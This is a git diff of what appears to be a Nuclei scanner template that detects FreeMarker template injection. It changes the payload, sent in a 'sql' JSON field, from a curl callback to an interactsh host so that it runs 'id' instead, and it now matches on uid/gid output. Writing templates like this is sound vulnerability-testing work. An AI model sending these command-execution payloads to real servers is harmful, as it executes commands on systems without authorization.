minor update
parent
e3ce693b08
commit
903e3a6dd9
|
@ -38,20 +38,20 @@ http:
|
|||
|
||||
body: |
|
||||
{
|
||||
"sql": "select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ex(\"curl {{interactsh-url}}\")}'"
|
||||
"sql": "select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ex(\"id\")}'"
|
||||
}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
part: content_type
|
||||
words:
|
||||
- "ListManagerWeb"
|
||||
- "application/json"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
Loading…
Reference in New Issue